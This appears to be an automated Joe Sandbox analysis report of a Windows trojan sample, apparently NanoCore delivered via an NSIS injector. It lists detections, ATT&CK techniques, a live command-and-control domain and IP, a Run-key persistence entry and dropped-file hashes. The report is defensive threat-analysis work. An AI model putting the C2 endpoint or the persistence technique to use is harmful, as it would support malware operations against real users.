      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Windows Management Instrumentation      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		1
      Disable or Modify Tools      		21
      Input Capture      		1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts12
      Native API      		Boot or Logon Initialization Scripts112
      Process Injection      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory2
      File and Directory Discovery      		Remote Desktop Protocol21
      Input Capture      		Exfiltration Over Bluetooth1
      Non-Standard Port      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts2
      Command and Scripting Interpreter      		Logon Script (Windows)1
      Registry Run Keys / Startup Folder      		2
      Obfuscated Files or Information      		Security Account Manager26
      System Information Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		Automated Exfiltration1
      Remote Access Software      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
      Software Packing      		NTDS141
      Security Software Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Non-Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading      		LSA Secrets2
      Process Discovery      		SSHKeyloggingData Transfer Size Limits21
      Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common31
      Virtualization/Sandbox Evasion      		Cached Domain Credentials31
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Access Token Manipulation      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
      Process Injection      		Proc Filesystem1
      Remote System Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      Hidden Files and Directories      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 798336 Sample: PhviZrlpkW.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 7 other signatures 2->50 7 PhviZrlpkW.exe 19 2->7         started        10 edpm.exe 2->10         started        13 edpm.exe 2->13         started        process3 file4 28 C:\Users\user\AppData\Local\...\tchnhwrvi.exe, PE32 7->28 dropped 15 tchnhwrvi.exe 1 2 7->15         started        54 Multi AV Scanner detection for dropped file 10->54 19 WerFault.exe 4 10 10->19         started        21 WerFault.exe 10 13->21         started        signatures5 process6 file7 32 C:\Users\user\AppData\Roaming\...\edpm.exe, PE32 15->32 dropped 36 Multi AV Scanner detection for dropped file 15->36 38 Detected unpacking (creates a PE file in dynamic memory) 15->38 40 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->40 42 Maps a DLL or memory area into another process 15->42 23 tchnhwrvi.exe 9 15->23         started        signatures8 process9 dnsIp10 34 thesopranos.duckdns.org 193.31.30.138, 1365, 49691, 49693 QUICKPACKETUS United Kingdom 23->34 30 C:\Users\user\AppData\Roaming\...\run.dat, data 23->30 dropped 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->52 file11 signatures12

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PhviZrlpkW.exe58%ReversingLabsWin32.Trojan.Nsisx
      PhviZrlpkW.exe53%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe65%ReversingLabsWin32.Trojan.NSISInject
      C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe52%VirustotalBrowse
      C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe65%ReversingLabsWin32.Trojan.NSISInject
      C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe52%VirustotalBrowse

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.2.tchnhwrvi.exe.aa0000.1.unpack100%AviraHEUR/AGEN.1215480Download File
      2.2.tchnhwrvi.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      0.2.PhviZrlpkW.exe.28a8998.1.unpack100%AviraHEUR/AGEN.1215480Download File
      2.2.tchnhwrvi.exe.5df0000.31.unpack100%AviraTR/NanoCore.fadteDownload File
      2.2.tchnhwrvi.exe.441b408.27.unpack100%AviraTR/NanoCore.fadteDownload File
      2.2.tchnhwrvi.exe.3330000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      SourceDetectionScannerLabelLink
      thesopranos.duckdns.org1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      thesopranos.duckdns.org1%VirustotalBrowse
      thesopranos.duckdns.org100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      thesopranos.duckdns.org
      		193.31.30.138
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      thesopranos.duckdns.orgtrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorErrorPhviZrlpkW.exefalse
        		high
        http://google.comtchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            193.31.30.138
            		thesopranos.duckdns.orgUnited Kingdom
            		46261QUICKPACKETUStrue

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:798336
            Start date and time:2023-02-03 23:16:11 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:PhviZrlpkW.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@9/17@17/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 14.9% (good quality ratio 14.3%)
            • Quality average: 82.8%
            • Quality standard deviation: 26%
            HCA Information:
            • Successful, ratio: 93%
            • Number of executed functions: 79
            • Number of non-executed functions: 93
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.21
            • Excluded domains from analysis (whitelisted): blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            23:17:10API Interceptor934x Sleep call for process: tchnhwrvi.exe modified
            23:17:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxn C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
            23:17:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxn C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
            23:17:34API Interceptor2x Sleep call for process: WerFault.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            193.31.30.138y5S5mjkeeT.exeGet hashmaliciousBrowse
              X80UfZE3PA.exeGet hashmaliciousBrowse
                Order No 2118013.docGet hashmaliciousBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  thesopranos.duckdns.orgy5S5mjkeeT.exeGet hashmaliciousBrowse
                  • 193.31.30.138

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  QUICKPACKETUSy5S5mjkeeT.exeGet hashmaliciousBrowse
                  • 193.31.30.138
                  X80UfZE3PA.exeGet hashmaliciousBrowse
                  • 193.31.30.138
                  POS2303OC.exeGet hashmaliciousBrowse
                  • 141.98.16.169
                  ye6eow5tNk.exeGet hashmaliciousBrowse
                  • 185.239.208.35
                  Order No 2118013.docGet hashmaliciousBrowse
                  • 193.31.30.138
                  dGCnwOnxb1.elfGet hashmaliciousBrowse
                  • 185.202.238.20
                  B0MdnLnOIa.elfGet hashmaliciousBrowse
                  • 185.202.238.20
                  POWN200303885-GSN.exeGet hashmaliciousBrowse
                  • 195.216.148.18
                  Bank Copy pdf.exeGet hashmaliciousBrowse
                  • 195.216.148.21
                  8ClxEvJqX2.exeGet hashmaliciousBrowse
                  • 141.98.16.169
                  pre-orderX26.1.2023.xlsGet hashmaliciousBrowse
                  • 141.98.16.169
                  SqzIdNdUeI.exeGet hashmaliciousBrowse
                  • 160.202.77.61
                  AWB# 771041096568.exeGet hashmaliciousBrowse
                  • 141.98.16.169
                  2FhepOGQj37Wiy9.exeGet hashmaliciousBrowse
                  • 141.98.16.169
                  Vadesiz Hesap - 3620-1083113.exeGet hashmaliciousBrowse
                  • 194.50.194.136
                  sSB5yHCWJg.elfGet hashmaliciousBrowse
                  • 208.166.51.213
                  U4OJ1nTj2g.elfGet hashmaliciousBrowse
                  • 185.187.170.213
                  x0QSH1b7vH.elfGet hashmaliciousBrowse
                  • 67.227.105.197
                  Dhl 00238847673.exeGet hashmaliciousBrowse
                  • 194.50.197.57
                  Dhl shipment 753456792445.exeGet hashmaliciousBrowse
                  • 194.50.197.57

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_edpm.exe_98859aec2feace66336d4eb3ad62fedc1a5d529e_aad16012_04aefae6\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9009185981848317
                  Encrypted:false
                  SSDEEP:96:samMF1rqNb2RhED7ZRNFpXIQcQ1Uc61dcElcw30vk+HbHg/5FAZugtYsaeOEXCkN:V7cbHQDfYvtjMGIq/u7syS274ItAT
                  MD5:4C9B37DD98DEBA952CA651C113023767
                  SHA1:7887DE1B1A6A583E01E1CDC5EBBE63BB4334C4FC
                  SHA-256:DE3D30114334E4D0E04879F18702842677CC0C44096EBF3216286369E672B302
                  SHA-512:B4453A4927711578D3A60ACF796EACFED4D453A7A0F0197E34C047143EB8F3981734D5E016244DC011E365B5C635E31EF87F1F87AE1DC2FCC70B63B1757BA7D2
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.9.3.6.2.4.4.3.3.7.1.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.9.3.6.2.4.5.8.3.7.2.1.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.1.2.0.6.8.1.-.b.b.9.9.-.4.3.d.c.-.8.9.4.a.-.9.5.d.0.e.5.0.e.e.b.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.7.c.e.0.f.f.-.d.7.2.5.-.4.0.8.d.-.a.4.9.6.-.c.2.2.b.c.4.6.1.e.9.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.d.p.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.a.4.-.0.0.0.1.-.0.0.1.f.-.6.0.8.9.-.a.1.4.7.1.d.3.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.3.e.9.2.b.c.b.c.a.a.a.3.b.2.b.0.b.c.8.6.1.a.c.d.9.5.9.8.9.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.e.0.2.2.2.b.9.d.0.2.5.c.c.d.b.4.f.f.d.6.b.e.4.4.3.e.c.1.1.d.0.4.2.d.4.9.9.3.!.e.d.p.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.2././.0.1.:.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_edpm.exe_98859aec2feace66336d4eb3ad62fedc1a5d529e_aad16012_0e2afae6\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8944933806572445
                  Encrypted:false
                  SSDEEP:96:sFm9FFTuNb3RhED7ZRNFpXIQcQ1Uc61dcElcw30vk+HbHg5+5uHQ0DFF3V9w72/j:BnUCHQDfYvtjscPq/u7syS274ItAT
                  MD5:C237F13C24934957828430FA85EE2978
                  SHA1:FBC73199D8AAE59017DFD6F688B1C9407204B96E
                  SHA-256:6E17F3B7FDA360093B4ED4B1E3E3B151B67619323F387C78A75874D8981FACEF
                  SHA-512:195139294E3368FB93BBB011C2B12D0C0A3ED65E274CD825391D0926D604C93DB48AFDECCBE0B292D636E8DEDCBDA8799FEE3050739BDF05EC35FCCEA438D741
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.9.3.6.2.5.0.4.8.7.7.7.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.9.3.6.2.5.1.4.2.5.3.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.5.c.7.2.3.3.-.6.4.e.3.-.4.8.0.2.-.b.d.8.4.-.d.a.8.5.7.1.0.6.b.2.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.9.9.a.0.4.2.-.7.a.d.6.-.4.7.b.7.-.9.6.0.1.-.f.c.e.d.f.8.5.3.7.2.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.d.p.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.f.0.-.0.0.0.1.-.0.0.1.f.-.4.7.d.c.-.8.5.4.d.1.d.3.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.3.e.9.2.b.c.b.c.a.a.a.3.b.2.b.0.b.c.8.6.1.a.c.d.9.5.9.8.9.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.e.0.2.2.2.b.9.d.0.2.5.c.c.d.b.4.f.f.d.6.b.e.4.4.3.e.c.1.1.d.0.4.2.d.4.9.9.3.!.e.d.p.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.2././.0.1.:.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1E2.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Feb 3 22:17:24 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):42040
                  Entropy (8bit):2.024512213894416
                  Encrypted:false
                  SSDEEP:192:ofWJo53RwgHzOsQcNq8T+VZesgYgFSwBySXPV:5nsZ7GZesgYgFSw1f
                  MD5:808457693416B37EAAACEECA1AEAEC7B
                  SHA1:4A9D9E3EC429F09E83B23E7CB8A3AB679D2C1E4E
                  SHA-256:D9533C0DBFA1E421D1151013B0A5F6A00AC33B64C59CE31BD7F8DB68858157BF
                  SHA-512:499B65D56DBCF65367E0DDA6A43EBFA416897329D16A9E0785225C692746DB92E165429425CFBEE646D8B0421AE1F8E827945C04D12068AFC1F5711E298F1FDF
                  Malicious:false
                  Reputation:low
                  Preview:MDMP....... .........c........................P...............Z+..........T.......8...........T...........(................................................................................................U...........B......p.......GenuineIntelW...........T.............c............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD405.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8322
                  Entropy (8bit):3.686852809842928
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNilh6H6YeuSU2KEGgmf6S8+prZ89bo3sf4hYm:RrlsNij6H6YXSU2Agmf6Smo8f4L
                  MD5:C47FB1BFB839DF2A251DAC5266C6E9A3
                  SHA1:29342D732474A52AA8D7321189C1F8B276B3762C
                  SHA-256:68BE108158A425B67822B9C7F5FBAAEA575948EA5F300BCD941BF96BA6D6829B
                  SHA-512:AE6BCA833F2FE32E6E013E20E1FE87DAD09D0BA7CB015A9698A0C05267ECD42FD1C7BBB80166E4FD5B97739AE8DCFD00123253E84435A93EF769308DDDFBB4E8
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.6.8.<./.P.i.d.>.......

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD445.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4622
                  Entropy (8bit):4.403333093343135
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zsVJgtWI9D/TWgc8sqYjja8fm8M4JH4FZ+q8vQ3IN1zCzd:uITfva/igrsqYvJUKG41zCzd
                  MD5:7677B4D88DD3595FDD3354DAA341E362
                  SHA1:03198DAFD342EBF9A54DD17EA90692679AF72353
                  SHA-256:3A8B0111006362C92C0B6B7668CC8AC142E5AADE3D8FC021221BCBD7F6BF96E2
                  SHA-512:2E31DD349090687C5EAC647D1B6BCCA28292FE426B47113CB73EF8370BDC805958A7B33DCCAF876356EE940EC3068C4B6617E2170EAE3281D3CED301DB70BA56
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1896928" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9EE.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Feb 3 22:17:30 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):40436
                  Entropy (8bit):2.056282829146087
                  Encrypted:false
                  SSDEEP:192:ilfHniryTxFOoQc6pyqb02JzQXX6e7+V6pAocCA:sqoJNqb0KzsX6y+V6phA
                  MD5:1FB3EEB01C764DABAE22F44D5E551ADE
                  SHA1:2A2685BA4440D874B09998888DD32B41517DBEDF
                  SHA-256:4342A5672DEF74E8D6A44A467C186DE7A2968AA94A37846E26641B95251E9597
                  SHA-512:D4194BE3E79E69C0A5CE5C235AD5F1ED9670D565CD07BA119418C09D10B749E81313831DCEA65D5180A19EA6DEC14D3C9B233C22A0DB15E1A968B759C06F8EAA
                  Malicious:false
                  Reputation:low
                  Preview:MDMP....... ..........c.........................................*..........T.......8...........T.......................................l....................................................................U...........B..............GenuineIntelW...........T..............c............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC12.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8316
                  Entropy (8bit):3.690400665517579
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNimMH6x6YelSUtlVzgmf6S8+pr789b0isfucm:RrlsNiF6x6YcSUtTgmf6Ss0hfM
                  MD5:1B31096CBE7D3E726A599C9CC6C105DC
                  SHA1:DC57E5F1AD6FDCCC9413466C3E2E567289A054AB
                  SHA-256:2342825010A897DB92CA99D0E5152A2357D94781A5E600212A7C06B0E0D62726
                  SHA-512:8238BBD8DBE58B01AB1581794741357E3F167C1C2AE2F8241FAE26AEE97EF8AFDBCA087C5707079AA01BDD3362D218BCDC3E465D8B573D9A923029FCC5134DF7
                  Malicious:false
                  Reputation:low
